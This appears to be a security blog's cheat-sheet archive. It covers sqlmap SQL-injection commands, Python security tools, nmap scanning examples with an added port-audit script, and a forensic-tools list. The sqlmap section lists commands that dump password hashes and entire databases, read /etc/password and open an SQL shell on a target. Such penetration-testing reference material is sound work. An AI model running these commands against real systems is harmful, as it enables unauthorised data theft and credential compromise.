Archive for the ‘Cheat sheets’ Category

Some useful sqlmap commands for testing for SQL injection vulnerabilities.

1) --is-dba: check whether the current user is a DBA
python sqlmap.py -u "url" --is-dba -v 1
2) --users: list the database management system users
python sqlmap.py -u "url" --users -v 0
3) --passwords: database user passwords (hashes)
python sqlmap.py -u "url" --passwords -v 0
python sqlmap.py -u "url" --passwords -U sa -v 0
4) --privileges: view user permissions
python sqlmap.py -u "url" --privileges -v 0
python sqlmap.py -u "url" --privileges -U postgres -v 0
5) --dbs: list the available databases
python sqlmap.py -u "url" --dbs -v 0
6) --tables: list the tables in a database
python sqlmap.py -u "url" --tables -D "information_schema"
-D: specifies the database name
7) --columns: list the column names of a table
python sqlmap.py -u "url" --columns -T "user" -D "mysql" -v 1
-T: specifies the table name, -D: specifies the database name
8) --dump: dump the contents of the specified columns
python sqlmap.py -u "url" --dump -T "users" -D "testdb"
-C: specifies the columns (fields)
Limit the dump to the range 2-4:
python sqlmap.py -u "url" --dump -T "users" -D "testdb" --start 2 --stop 4 -v 0
9) --dump-all: list the contents of all databases and all tables
python sqlmap.py -u "url" --dump-all -v 0
List only the contents of the user's own databases and tables:
python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0
10) --file: read the content of a file [load_file() function]
python sqlmap.py -u "url" --file /etc/password
11) Execute SQL
python sqlmap.py -u "url" --sql-shell
12) -p: specify the parameter to test
python sqlmap.py -u "url" -v 1 -p "id"
Multiple parameters can be given: -p "cat,id"
13) POST submission
python sqlmap.py -u "url" --method POST --data "id=1"
14) Cookie submission
python sqlmap.py -u "url" --cookie "id=1" -v 1
The cookie value can be captured with TamperData
15) Spoof the Referer header
python sqlmap.py -u "url" --refer "url" -v 3
16) Use a custom user-agent or user-agents.txt
python sqlmap.py -u "url" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3
python sqlmap.py -u "url" -v 1 -a "./txt/user-agents.txt"
17) Use multiple threads for guessing
python sqlmap.py -u "url" -v 1 --current-user --threads 3
18) Specify the database, bypassing sqlmap's automatic detection
python sqlmap.py -u "url" -v 2 --dbms "PostgreSQL"
19) Specify the operating system, bypassing sqlmap's automatic detection
python sqlmap.py -u "url" -v 2 --os "Windows"
20) --prefix and --postfix: custom payload
python sqlmap.py -u "url" -v 3 -p "id" --prefix "'" --postfix "and 'test'='test"
21) UNION injection test
python sqlmap.py -u "url" --union-test -v 1
22) With ORDER BY
python sqlmap.py -u "url" --union-test --union-tech orderby -v 1
23) python sqlmap.py -u "url" -v 1 --union-use --banner
24) python sqlmap.py -u "url" -v 5 --union-use --current-user
25) python sqlmap.py -u "url" -v 1 --union-use --dbs


If you are involved in vulnerability research, reverse engineering or penetration testing, I suggest trying out the Python programming language. It has a rich set of useful libraries and programs. This page lists some of them.
Most of the listed tools are written in Python, others are just Python bindings for existing C libraries, i.e. they make those libraries easily usable from Python programs.
Some of the more aggressive tools (pentest frameworks, bluetooth smashers, web application vulnerability scanners, war-dialers, etc.) are left out. This list is clearly meant to help whitehats, and for now I prefer to err on the safe side.

Network

  • Scapy, Scapy3k: send, sniff, dissect and forge network packets. Usable interactively or as a library
  • pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap
  • libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission
  • dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols
  • Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB
  • pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection
  • Dirtbags py-pcap: read pcap files without libpcap
  • flowgrep: grep through packet payloads using regular expressions
  • Knock Subdomain Scan, enumerate subdomains on a target domain through a wordlist
  • SubBrute, fast subdomain enumeration tool
  • Mallory, extensible TCP/UDP man-in-the-middle proxy, supports modifying non-standard protocols on the fly
  • Pytbull: flexible IDS/IPS testing framework (shipped with more than 300 tests)
  • Spoodle: A mass subdomain + poodle vulnerability scanner
  • SMBMap: enumerate Samba share drives across an entire domain

Debugging and reverse engineering

  • Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH
  • Immunity Debugger: scriptable GUI and command line debugger
  • mona.py: PyCommand for Immunity Debugger that replaces and improves on pvefindaddr
  • IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro
  • PyEMU: fully scriptable IA-32 emulator, useful for malware analysis
  • pefile: read and work with Portable Executable (aka PE) files
  • pydasm: Python interface to the libdasm x86 disassembling library
  • PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine
  • uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory
  • diStorm: disassembler library for AMD64, licensed under the BSD license
  • python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python
  • vdb / vtrace: vtrace is a cross-platform process debugging API implemented in python, and vdb is a debugger which uses it
  • Androguard: reverse engineering and analysis of Android applications
  • Capstone: lightweight multi-platform, multi-architecture disassembly framework with Python bindings
  • Keystone: lightweight multi-platform, multi-architecture assembler framework with Python bindings
  • PyBFD: Python interface to the GNU Binary File Descriptor (BFD) library
  • CHIPSEC: framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components.

Fuzzing

  • afl-python: enables American fuzzy lop fork server and instrumentation for pure-Python code
  • Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components
  • Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing (v2 was written in Python)
  • antiparser: fuzz testing and fault injection API
  • TAOF, (The Art of Fuzzing) including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer
  • untidy: general purpose XML fuzzer
  • Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer)
  • SMUDGE
  • Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns
  • Fuzzbox: multi-codec media fuzzer
  • Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems
  • Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms
  • WSBang: perform automated security testing of SOAP based web services
  • Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner
  • fuzzer.py (feliam): simple fuzzer by Felipe Andres Manzano
  • Fusil: Python library used to write fuzzing programs

Web

  • Requests: elegant and simple HTTP library, built for human beings
  • HTTPie: human-friendly cURL-like command line HTTP client
  • ProxMon: processes proxy logs and reports discovered issues
  • WSMap: find web service endpoints and discovery files
  • Twill: browse the Web from a command-line interface. Supports automated Web testing
  • Ghost.py: webkit web client written in Python
  • Windmill: web testing tool designed to let you painlessly automate and debug your web application
  • FunkLoad: functional and load web tester
  • spynner: Programmatic web browsing module for Python with Javascript/AJAX support
  • python-spidermonkey: bridge to the Mozilla SpiderMonkey JavaScript engine; allows for the evaluation and calling of Javascript scripts and functions
  • mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly
  • pathod / pathoc: pathological daemon/client for tormenting HTTP clients and servers

Forensics

  • Volatility: extract digital artifacts from volatile memory (RAM) samples
  • Rekall: memory analysis framework developed by Google
  • LibForensics: library for developing digital forensics applications
  • TrIDLib, identify file types from their binary signatures. Now includes Python binding
  • aft: Android forensic toolkit

Malware analysis

  • pyew: command line hexadecimal editor and disassembler, mainly to analyze malware
  • Exefilter: filter file formats in e-mails, web pages or files. Detects many common file formats and can remove active content
  • pyClamAV: add virus detection capabilities to your Python software
  • jsunpack-n, generic JavaScript unpacker: emulates browser functionality to detect exploits that target browser and browser plug-in vulnerabilities
  • yara-python: identify and classify malware samples
  • phoneyc: pure Python honeyclient implementation
  • CapTipper: analyse, explore and revive HTTP malicious traffic from PCAP file

PDF

  • peepdf: Python tool to analyse and explore PDF files to find out if they can be harmful
  • Didier Stevens’ PDF tools: analyse, identify and create PDF files (includes PDFiD, pdf-parser, make-pdf and mPDF)
  • Opaf: Open PDF Analysis Framework. Converts PDF to an XML tree that can be analyzed and modified.
  • Origapy: Python wrapper for the Origami Ruby module which sanitizes PDF files
  • pyPDF2: pure Python PDF toolkit: extract info, split, merge, crop, encrypt, decrypt…
  • PDFMiner: extract text from PDF files
  • python-poppler-qt4: Python binding for the Poppler PDF library, including Qt4 support

Misc

  • InlineEgg: toolbox of classes for writing small assembly programs in Python
  • Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging
  • RevHosts: enumerate virtual hosts for a given IP address
  • simplejson: JSON encoder/decoder, e.g. to use Google’s AJAX API
  • PyMangle: command line tool and a python library used to create word lists for use with other penetration testing tools
  • Hachoir: view and edit a binary stream field by field
  • py-mangle: command line tool and a python library used to create word lists for use with other penetration testing tools
  • wmiexec.py: execute Powershell commands quickly and easily via WMI
  • Pentestly: Python and Powershell internal penetration testing framework

Other useful libraries and tools

  • IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system
  • Beautiful Soup: HTML parser optimized for screen-scraping
  • matplotlib: make 2D plots of arrays
  • Mayavi: 3D scientific data visualization and plotting
  • RTGraph3D: create dynamic graphs in 3D
  • Twisted: event-driven networking engine
  • Suds: lightweight SOAP client for consuming Web Services
  • M2Crypto: most complete OpenSSL wrapper
  • NetworkX: graph library (edges, nodes)
  • Pandas: library providing high-performance, easy-to-use data structures and data analysis tools
  • pyparsing: general parsing module
  • lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language
  • Whoosh: fast, featureful full-text indexing and searching library implemented in pure Python
  • Pexpect: control and automate other programs, similar to Don Libes `Expect` system
  • Sikuli, visual technology to search and automate GUIs using screenshots. Scriptable in Jython
  • PyQt and PySide: Python bindings for the Qt application framework and GUI library

Books

 

nmap

Nmap is a powerful network scanner used to identify systems and services. nmap was originally developed with network security in mind; it is a tool designed to find vulnerabilities within a network. nmap is more than just a simple port scanner, though: you can use it to find specific versions of services, certain OS types, or even that pesky printer someone put on your network without telling you.

nmap can be used for good and for evil. Today we will cover some common situations where nmap makes life easier for sysadmins, which is generally good. Even if some sysadmins are evil…

Discover IP’s in a subnet (no root)

 $ nmap -sP 192.168.0.0/24
 Starting Nmap 7.30 ( http://nmap.org ) at 2016-10-12 21:12 GMT
 Nmap scan report for 192.168.0.1
 Host is up (0.0013s latency).
 Nmap scan report for 192.168.0.92
 Host is up (0.0032s latency).
 Nmap scan report for 192.168.0.113
 Host is up (0.0011s latency).

This is one of the simplest uses of nmap. This command is commonly referred to as a “ping scan”, and tells nmap to send an ICMP echo request, a TCP SYN to port 443, a TCP ACK to port 80 and an ICMP timestamp request to all hosts in the specified subnet. nmap will simply return a list of IPs that responded. Unlike many nmap commands, this one does not require root privileges; however, when executed by root, nmap will also by default send ARP requests to the subnet.

Scan for open ports (no root)

 $ nmap 192.168.0.0/24
 Starting Nmap 7.30 ( http://nmap.org ) at 2016-10-12 21:20 GMT
 Nmap scan report for 192.168.0.1
 Host is up (0.0043s latency).
 Not shown: 998 closed ports
 PORT STATE SERVICE
 80/tcp open http
 443/tcp open https

This is nmap's default scan and can take some time to complete. With this scan nmap will attempt a TCP SYN connection to 1000 of the most common ports, as well as an ICMP echo request to determine whether a host is up. nmap will also perform a reverse DNS lookup on the identified IPs, as this can sometimes be useful information.

Identify the Operating System of a host (requires root)

 # nmap -O 192.168.0.164
 Starting Nmap 7.30 ( http://nmap.org ) at 2016-10-12 21:35 GMT
 Nmap scan report for 192.168.0.112
 Host is up (0.00032s latency).
 Not shown: 996 closed ports
 PORT STATE SERVICE
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp
 MAC Address: 00:00:00:00:00:00 (Unknown)
 Device type: general purpose
 Running: Apple Mac OS X 10.5.X
 OS details: Apple Mac OS X 10.5 - 10.6 (Leopard - Snow Leopard) (Darwin 9.0.0b5 - 10.0.0)
 Network Distance: 1 hop

With the -O option nmap will try to guess the target's operating system. This is accomplished by using information that nmap already gets through the TCP SYN port scan. The result is a best guess but can be fairly accurate. The operating system scan does, however, require root privileges.

Identify Hostnames (no root)

 $ nmap -sL 192.168.0.0/24
 Starting Nmap 7.30 ( http://nmap.org ) at 2016-10-12 21:35 GMT
 Nmap scan report for 192.168.0.0
 Nmap scan report for router.local (192.168.0.1)
 Nmap scan report for fake.local (192.168.0.2)
 Nmap scan report for another.fake.local (192.168.0.3)

This is one of the most subtle nmap commands: the -sL flag tells nmap to do a simple DNS query for each specified IP. This allows you to find hostnames for all of the IPs in a subnet without having to send a packet to the individual hosts themselves.

Hostname information can tell you a lot more about a network than you would think, for instance if you labeled your Active Directory Servers with ads01.domain.com you shouldn’t be surprised if someone guesses its use.

TCP Syn and UDP Scan (requires root)

 # nmap -sS -sU -PN 192.168.0.164
 Starting Nmap 7.30 ( http://nmap.org ) at 2016-10-12 21:12 GMT
 Nmap scan report for 192.168.0.112
 Host is up (0.00029s latency).
 Not shown: 1494 closed ports, 496 filtered ports
 PORT STATE SERVICE
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp
 88/udp open|filtered kerberos-sec
 123/udp open ntp
 137/udp open netbios-ns
 138/udp open|filtered netbios-dgm
 631/udp open|filtered ipp
 5353/udp open zeroconf

The TCP SYN and UDP scan will take a while to complete but is fairly unobtrusive and stealthy. This command will check about 2000 common TCP and UDP ports to see if they are responding. The -Pn flag (written -PN, its older spelling, in the command above) tells nmap to skip the ping scan and assume the host is up. This can be useful when there is a firewall that might be preventing ICMP replies.

TCP SYN and UDP scan for all ports (requires root)

 # nmap -sS -sU -PN -p 1-65535 192.168.0.164
 Starting Nmap 7.30 ( http://nmap.org ) at 2016-10-12 21:36 GMT
 Nmap scan report for 192.168.0.112
 Host is up (0.00021s latency).
 Not shown: 131051 closed ports
 PORT STATE SERVICE
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp
 17500/tcp open unknown
 88/udp open|filtered kerberos-sec
 123/udp open ntp
 137/udp open netbios-ns
 138/udp open|filtered netbios-dgm
 631/udp open|filtered ipp
 5353/udp open zeroconf
 17500/udp open|filtered unknown
 51657/udp open|filtered unknown
 54658/udp open|filtered unknown
 57798/udp open|filtered unknown
 58488/udp open|filtered unknown
 60027/udp open|filtered unknown

This command is the same as above; however, by specifying the full port range from 1 to 65535, nmap will scan to see if the host is listening on all available ports. You can use the port range specification on any scan that performs a port scan.

TCP Connect Scan (no root)

 $ nmap -sT 192.168.0.164
 Starting Nmap 7.30 ( http://nmap.org ) at 2016-10-12 21:40 GMT
 Nmap scan report for 192.168.0.112
 Host is up (0.0015s latency).
 Not shown: 964 closed ports, 32 filtered ports
 PORT STATE SERVICE
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp

This command is similar to the TCP SYN scan; however, rather than sending a SYN packet and reviewing the headers, it asks the OS to establish a TCP connection to each of the 1000 common ports.

Aggressively Scan Hosts (no root)

 $ nmap -T4 -A 192.168.0.0/24
 Nmap scan report for 192.168.0.67
 Host is up (0.00060s latency).
 Not shown: 996 closed ports
 PORT STATE SERVICE VERSION
 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (protocol 2.0)
 | ssh-hostkey: 1024 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:6c (DSA)
 |_2048 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:6c (RSA)
 80/tcp open http nginx 1.1.19
 |_http-title: 403 Forbidden
 |_http-methods: No Allow or Public header in OPTIONS response (status code 405)
 111/tcp open rpcbind
 | rpcinfo:
 | program version port/proto service
 | 100000 2,3,4 111/tcp rpcbind
 | 100000 2,3,4 111/udp rpcbind
 | 100003 2,3,4 2049/tcp nfs
 | 100003 2,3,4 2049/udp nfs
 | 100005 1,2,3 46448/tcp mountd
 | 100005 1,2,3 52408/udp mountd
 | 100021 1,3,4 35394/udp nlockmgr
 | 100021 1,3,4 57150/tcp nlockmgr
 | 100024 1 49363/tcp status
 | 100024 1 51515/udp status
 | 100227 2,3 2049/tcp nfs_acl
 |_ 100227 2,3 2049/udp nfs_acl
 2049/tcp open nfs (nfs V2-4) 2-4 (rpc #100003)
 Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Unlike some of the earlier commands, this command is very aggressive and very obtrusive. The -A flag simply tells nmap to perform OS checking and version checking. The -T4 flag selects the speed template; these templates tell nmap how quickly to perform the scan. The speed template ranges from 0 for slow and stealthy to 5 for fast and obvious.

Fast Scan (no root)

 $ nmap -T4 -F 192.168.0.138
 Starting Nmap 7.30 ( http://nmap.org ) at 2016-10-12 21:48 GMT
 Nmap scan report for 192.168.0.112
 Host is up (0.00047s latency).
 Not shown: 96 closed ports
 PORT STATE SERVICE
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp

This scan is limited to the 100 most common ports. If you simply want to find hosts with ports open that shouldn’t be, this is a quick and dirty command to use.
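
To act on "ports open that shouldn't be", the scan report can be compared against the ports each host is expected to expose. The following is an added example, not part of the original post: it parses nmap's normal output in the format shown above and reports open or open|filtered ports that are missing from a baseline. The sample report, the baseline and the function names are constructed for illustration.

```python
import re
from collections import namedtuple

PortEntry = namedtuple("PortEntry", "port proto state service")

# Constructed sample in the normal-output format shown above (not a real scan).
SAMPLE_REPORT = """\
 Starting Nmap 7.30 ( http://nmap.org ) at 2016-10-12 21:48 GMT
 Nmap scan report for router.local (192.168.0.1)
 Host is up (0.0043s latency).
 Not shown: 98 closed ports
 PORT    STATE SERVICE
 80/tcp  open  http
 443/tcp open  https
 Nmap scan report for 192.168.0.112
 Host is up (0.00047s latency).
 Not shown: 94 closed ports
 PORT    STATE         SERVICE      VERSION
 88/tcp  open          kerberos-sec
 139/tcp open          netbios-ssn  Samba smbd 3.X (workgroup: WORKGROUP)
 445/tcp open          microsoft-ds
 631/tcp open          ipp          CUPS 1.4
 | http-methods: GET HEAD OPTIONS POST PUT
 |_See http://nmap.org/nsedoc/scripts/http-methods.html
 123/udp open          ntp
 631/udp open|filtered ipp
"""

# Hypothetical baseline: the ports each host is expected to expose.
BASELINE = {
    "192.168.0.1": {"80/tcp", "443/tcp"},
    "192.168.0.112": {"88/tcp", "139/tcp", "445/tcp"},
}

# "Nmap scan report for name (ip)" or "Nmap scan report for ip"
HOST_RE = re.compile(
    r"Nmap scan report for (?:\S+ \((?P<ip>[^)]+)\)|(?P<addr>\S+))")
# "631/udp open|filtered ipp [version...]"; NSE script lines start with "|"
# and therefore never match.
PORT_RE = re.compile(
    r"(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)")


def parse_report(text):
    """Return {ip: [PortEntry, ...]} from nmap normal output."""
    hosts = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.fullmatch(line)
        if m:
            current = m.group("ip") or m.group("addr")
            hosts.setdefault(current, [])  # keep hosts with no open ports
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            hosts[current].append(PortEntry(
                int(m.group("port")), m.group("proto"),
                m.group("state"), m.group("service")))
    return hosts


def audit(report_text, baseline, include_open_filtered=True):
    """List (ip, 'port/proto', state, reason) for ports outside the baseline.

    open|filtered (common for UDP) means nmap could not tell whether the
    port is open; it is reported by default so it gets checked by hand.
    """
    flagged_states = {"open"}
    if include_open_filtered:
        flagged_states.add("open|filtered")
    findings = []
    for ip, ports in parse_report(report_text).items():
        allowed = baseline.get(ip)
        for p in ports:
            if p.state not in flagged_states:
                continue
            key = f"{p.port}/{p.proto}"
            if allowed is None:
                findings.append((ip, key, p.state, "host not in baseline"))
            elif key not in allowed:
                findings.append((ip, key, p.state, "port not in baseline"))
    return findings


if __name__ == "__main__":
    for ip, key, state, reason in audit(SAMPLE_REPORT, BASELINE):
        print(f"{ip:15} {key:10} {state:14} {reason}")
```
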

Verbose

 $ nmap -T4 -A -v 192.168.0.164
 Starting Nmap 7.30 ( http://nmap.org ) at 2016-10-12 21:50 GMT
 NSE: Loaded 93 scripts for scanning.
 NSE: Script Pre-scanning.
 Initiating Ping Scan at 21:50
 Scanning 192.168.0.164 [2 ports]
 Completed Ping Scan at 21:50, 0.00s elapsed (1 total hosts)
 Initiating Parallel DNS resolution of 1 host. at 21:50
 Completed Parallel DNS resolution of 1 host. at 21:50, 0.01s elapsed
 Initiating Connect Scan at 21:50
 Scanning 192.168.0.187 [1000 ports]
 Discovered open port 139/tcp on 192.168.0.164
 Discovered open port 445/tcp on 192.168.0.164
 Discovered open port 88/tcp on 192.168.0.164
 Discovered open port 631/tcp on 192.168.0.164
 Completed Connect Scan at 21:50, 5.22s elapsed (1000 total ports)
 Initiating Service scan at 21:50
 Scanning 4 services on 192.168.0.164
 Completed Service scan at 21:51, 11.00s elapsed (4 services on 1 host)
 NSE: Script scanning 192.168.0.164.
 Initiating NSE at 21:51
 Completed NSE at 21:51, 12.11s elapsed
 Nmap scan report for 192.168.0.164
 Host is up (0.00026s latency).
 Not shown: 996 closed ports
 PORT STATE SERVICE VERSION
 88/tcp open kerberos-sec Mac OS X kerberos-sec
 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
 631/tcp open ipp CUPS 1.4
 | http-methods: GET HEAD OPTIONS POST PUT
 | Potentially risky methods: PUT
 |_See http://nmap.org/nsedoc/scripts/http-methods.html
 | http-robots.txt: 1 disallowed entry
 |_/
 Service Info: OS: Mac OS X; CPE: cpe:/o:apple:mac_os_x

By adding verbose to a majority of the commands above you get a better insight into what nmap is doing; for some scans verbosity will provide additional details that the report does not provide.
While these are 10 very useful nmap commands I am sure there are some more handy nmap examples out there. If you have one to add to this list feel free to drop it into a comment.


Here is some help for you guys and gals that are looking for some forensic tools. They can also be good fun to mess around with.

1. Disk tools and data capture

————————————————————————————————————–
Arsenal Image Mounter :
Mounts disk images as complete disks in Windows, giving access to Volume Shadow Copies, etc.
https://www.arsenalrecon.com/apps/image-mounter/
————————————————————————————————————–
DumpIt :
Generates a physical memory dump of Windows machines, 32-bit and 64-bit. Can run from a USB flash drive.
http://www.moonsols.com/2011/07/18/moonsols-dumpit-goes-mainstream/
————————————————————————————————————–
EnCase :
Create EnCase evidence files and EnCase logical evidence files
http://www1.guidancesoftware.com/Order-Forensic-Imager.aspx
————————————————————————————————————–
Encrypted Disk Detector :
Checks local physical drives on a system for TrueCrypt, PGP, or Bitlocker encrypted volumes
http://info.magnetforensics.com/encrypted-disk-detector
————————————————————————————————————–
EWF MetaEditor :
Edit EWF (E01) meta data, remove passwords (Encase v6 and earlier)
http://www.4discovery.com/our-tools/
————————————————————————————————————–
FAT32 Format :
Enables large capacity disks to be formatted as FAT32
http://www.ridgecrop.demon.co.uk/index.htm?fat32format.htm
————————————————————————————————————–
Forensics Acquisition of Websites :
Browser designed to forensically capture web pages
http://www.fawproject.com/en/default.aspx
————————————————————————————————————–
FTK Imager :
Imaging tool, disk viewer and image mounter
http://www.accessdata.com/support/product-downloads
————————————————————————————————————–
Guymager :
Multi-threaded GUI imager running under Linux
http://guymager.sourceforge.net/
————————————————————————————————————–
Live RAM Capturer :
Extracts RAM dump including that protected by an anti-debugging or anti-dumping system. 32 and 64 bit builds
http://forensic.belkasoft.com/en/ram-capturer
————————————————————————————————————–
NetworkMiner :
Network analysis tool. Detects OS, hostname and open ports of network hosts through packet sniffing/PCAP parsing
http://sourceforge.net/projects/networkminer/
————————————————————————————————————–
Nmap :
Utility for network discovery and security auditing
http://nmap.org/
————————————————————————————————————–
Magnet RAM :
Captures physical memory of a suspect’s computer. Windows XP to Windows 10, and 2003, 2008, 2012. 32 & 64 bit
http://www.magnetforensics.com/ram-capture/
————————————————————————————————————–
OSFClone :
Boot utility for CD/DVD or USB flash drives to create dd or AFF images/clones.
http://www.osforensics.com/tools/create-disk-images.html
————————————————————————————————————–
OSFMount :
Mounts a wide range of disk images. Also allows creation of RAM disks
http://www.osforensics.com/tools/mount-disk-images.html
————————————————————————————————————–
Wireshark :
Network protocol capture and analysis
https://www.wireshark.org/
————————————————————————————————————–
Disk2vhd :
Creates Virtual Hard Disks versions of physical disks for use in Microsoft Virtual PC or Microsoft Hyper-V VMs
https://technet.microsoft.com/en-gb/sysinternals/ee656415.aspx

————————————————————————————————————–
2. Email analysis

————————————————————————————————————–
EDB Viewer :
Open and view (not export) Outlook EDB files without an Exchange server
http://www.nucleustechnologies.com/exchange-edb-viewer.html
————————————————————————————————————–
Mail Viewer :
Viewer for Outlook Express, Windows Mail/Windows Live Mail, Mozilla Thunderbird message databases and single EML files
http://www.mitec.cz/mailview.html
————————————————————————————————————–
MBOX Viewer :
View MBOX emails and attachments
http://www.systoolsgroup.com/mbox-viewer.html
————————————————————————————————————–
OST Viewer  :
Open and view (not export) Outlook OST files without connecting to an Exchange server
http://www.nucleustechnologies.com/ost-viewer.html
————————————————————————————————————–
PST Viewer  :
Open and view (not export) Outlook PST files without needing Outlook
http://www.nucleustechnologies.com/pst-viewer.html
————————————————————————————————————–
3. General tools

————————————————————————————————————–
Agent Ransack :
Search multiple files using Boolean operators and Perl Regex
http://www.mythicsoft.com/page.aspx?type=agentransack&page=home
————————————————————————————————————–
Computer Forensic Reference Data Sets :
Collated forensic images for training, practice and validation
http://www.cfreds.nist.gov/
————————————————————————————————————–
EvidenceMover :
Copies data between locations, with file comparison, verification, logging
http://www.nuix.com/Nuix-evidence-mover
————————————————————————————————————–
FastCopy :
Self labelled ‘fastest’ copy/delete Windows software. Can verify with SHA-1, etc.
http://ipmsg.org/tools/fastcopy.html.en
————————————————————————————————————–
File Signatures :
Table of file signatures
http://www.garykessler.net/library/file_sigs.html
————————————————————————————————————–
HexBrowser :
Identifies over 1000 file types by examining their signatures
http://www.hexbrowser.com/
————————————————————————————————————–
HashMyFiles :
Calculate MD5 and SHA1 hashes
http://www.nirsoft.net/utils/hash_my_files.html
————————————————————————————————————–
MobaLiveCD :
Run Linux live CDs from their ISO image without having to boot to them
http://mobalivecd-en.mobatek.net/
————————————————————————————————————–
Mouse Jiggler :
Automatically moves mouse pointer stopping screen saver, hibernation etc.
http://mousejiggler.codeplex.com/
————————————————————————————————————–
Notepad ++ :
Advanced Notepad replacement
http://notepad-plus-plus.org/
————————————————————————————————————–
NSRL :
Hash sets of ‘known’ (ignorable) files
http://www.nsrl.nist.gov/Downloads.htm
————————————————————————————————————–
Quick Hash :
A Linux & Windows GUI for individual and recursive SHA1 hashing of files
http://sourceforge.net/projects/quickhash/
————————————————————————————————————–
USB Write Blocker :
Enables software write-blocking of USB ports
http://dsicovery.com/dsicovery-software/usb-write-blocker/
————————————————————————————————————–
Volix :
Application that simplifies the use of the Volatility Framework
http://www.it-forensik.fh-aachen.de/projekte/volix/13
————————————————————————————————————–
Windows Forensic Environment :
Guide by Brett Shavers to creating and working with a Windows boot CD
http://winfe.wordpress.com/
————————————————————————————————————–
4. File and data analysis

————————————————————————————————————–
Advanced Prefetch Analyser :
Reads Windows XP,Vista and Windows 7 prefetch files
http://www.ash368.com/
————————————————————————————————————–
analyzeMFT :
Parses the MFT from an NTFS file system allowing results to be analysed with other tools
https://github.com/dkovar/analyzeMFT
————————————————————————————————————–
bstrings :
Find strings in binary data, including regular expression searching.
https://binaryforay.blogspot.co.uk/2015/07/introducing-bstrings-better-strings.html
————————————————————————————————————–
CapAnalysis :
PCAP viewer
http://www.capanalysis.net/site/
————————————————————————————————————–
Crowd Response :
Windows console application to aid gathering of system information for incident response and security engagements.
http://www.crowdstrike.com/community-tools/
————————————————————————————————————–
Crowd Inspect :
Details network processes, listing binaries associated with each process. Queries VirusTotal, other malware repositories & reputation services to produce “at-a-glance” state of the system
http://www.crowdstrike.com/community-tools/
————————————————————————————————————–
DCode :
Converts various data types to date/time values
http://www.digital-detective.net/digital-forensic-software/free-tools/
————————————————————————————————————–
Defraser :
Detects full and partial multimedia files in unallocated space
http://sourceforge.net/projects/defraser/
————————————————————————————————————–
eCryptfs Parser :
Recursively parses headers of every eCryptfs file in selected directory. Outputs encryption algorithm used, original file size, signature used, etc.
http://sourceforge.net/projects/ecryptfs-p/
————————————————————————————————————–
Encryption Analyzer :
Scans a computer for password-protected & encrypted files, reports encryption complexity and decryption options for each file
http://www.lostpassword.com/encryption-analyzer.htm
————————————————————————————————————–
ExifTool :
Read, write and edit Exif data in a large number of file types
http://www.sno.phy.queensu.ca/~phil/exiftool/
————————————————————————————————————–
File Identifier :
Drag and drop web-browser JavaScript tool for identification of over 2000 file types
http://www.toolsley.com/
————————————————————————————————————–
Forensic Image Viewer :
View various picture formats, image enhancer, extraction of embedded Exif, GPS data
http://www.sandersonforensics.com/forum/list.php?category/46-Free-Software
————————————————————————————————————–
Ghiro :
In-depth analysis of image (picture) files
http://www.getghiro.org/
————————————————————————————————————–
Highlighter :
Examine log files using text, graphic or histogram views
http://www.mandiant.com/products/free_software/highlighter/
————————————————————————————————————–
Link Parser :
Recursively parses folders extracting 30+ attributes from Windows .lnk (shortcut) files
http://www.4discovery.com/our-tools/
————————————————————————————————————–
LiveContactsView :
View and export Windows Live Messenger contact details
http://www.nirsoft.net/utils/live_messenger_contacts.html
————————————————————————————————————–
PECmd :
Prefetch Explorer
https://binaryforay.blogspot.co.uk/2016/01/pecmd-v0600-released.html
————————————————————————————————————–
PlatformAuditProbe :
Command-line Windows forensic/incident response tool that collects many artefacts.
https://appliedalgo.com/
————————————————————————————————————–
RSA Netwitness Investigator :
Network packet capture and analysis
http://www.emc.com/security/rsa-netwitness.htm#!freeware
————————————————————————————————————–
Memoryze :
Acquire and/or analyse RAM images, including the page file on live systems
http://www.mandiant.com/products/free_software/memoryze/
